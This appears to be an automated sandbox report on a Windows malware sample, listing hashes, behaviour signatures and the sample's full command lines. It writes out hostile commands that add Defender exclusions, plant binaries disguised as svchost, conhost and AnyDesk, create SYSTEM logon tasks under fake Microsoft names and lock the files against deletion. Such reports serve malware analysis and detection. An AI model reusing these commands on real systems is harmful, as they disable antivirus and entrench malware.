C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat

MD5 71d06b71522b0ecd9e42ee36b73a8976
SHA1 5615791d6e861b721e9945d55a0946f4e51d0302
SHA256 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0
SHA512 f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84

memory/2368-6-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

memory/2368-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/2368-8-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2368-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-13-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-12-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

memory/2368-14-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKREIYQYHA5FFTSKC0R8.temp

MD5 9c7ee159aaa9f81e64626f1dd77faee8
SHA1 238e19a07b69168e36b84f97a41ec1fb4bf7b934
SHA256 543a9dc963592001e404058efb76b87dde2c711445be13a356b27ca2ab6be211
SHA512 27d0d34d84207b36c5a553e2cebe5bc2f4b64730b0a3326c3dbe4f4cc5f2b248019554425d961a7de6fa119d48957be1dc062b224c4d9a06ca075568e1fc3c8a

memory/2596-20-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2596-21-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 22:59

Reported

2024-06-20 23:02

Platform

win10v2004-20240611-en

Max time kernel

144s

Max time network

107s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 780 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 780 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 3276 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 2412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 3276 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3276 wrote to memory of 4300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3276 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\svchost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\svchost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\conhost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\conhost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\anydesk.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

